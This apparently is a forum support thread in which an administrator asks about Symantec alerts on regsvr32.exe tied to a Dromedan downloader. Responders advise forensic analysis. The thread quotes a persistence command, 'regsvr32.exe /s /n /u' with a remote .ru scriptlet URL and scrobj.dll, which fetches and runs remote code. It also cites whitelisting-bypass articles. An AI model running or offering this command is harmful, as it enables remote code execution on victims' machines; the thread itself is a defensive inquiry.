We are continuosly seeing the alerts related to Downloader Dromedan attack activity blocked and the culprit service is regsvr32.exe which falls under the category of SONAR.SuspLaunch!g24 as reported by Symantec. Please assist so as to what steps should be followed:
Are you under the impression this is a false positive? I would submit to Symantec so they can review this.
Thanks for the response. I submitted the sample and as per Symantec, the file regsvr32.exe is clean. I went through many articles online(https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-regsvr32-exe/)(https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/) and found that there is some registry entry created in the system by which regsvr32 tries to register a dll and then attempts to connect to a malicious URL which is blocked by SEP.
The registry entry created is regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll.
I want analysis and clue from where this entry got created in registry and why only scrobj.dll was selected by regsvr32.exe to connect to the malicious domain.
Can you help please.
You'd need the initial dropper or malicious file that created it to analyze.
Can we check somehow which was the dropper file and is the file still present on system.
Tough to say. You'll want to run a full fornensic analysis on the system and try to correlate it with logs from your network devices such as your firewall/IPS to see how it got in. Ideally, if you had file integrity monitoring enabled for the system it would make it easier.
The problem persists and the symantec team has not taken the task of solving the problem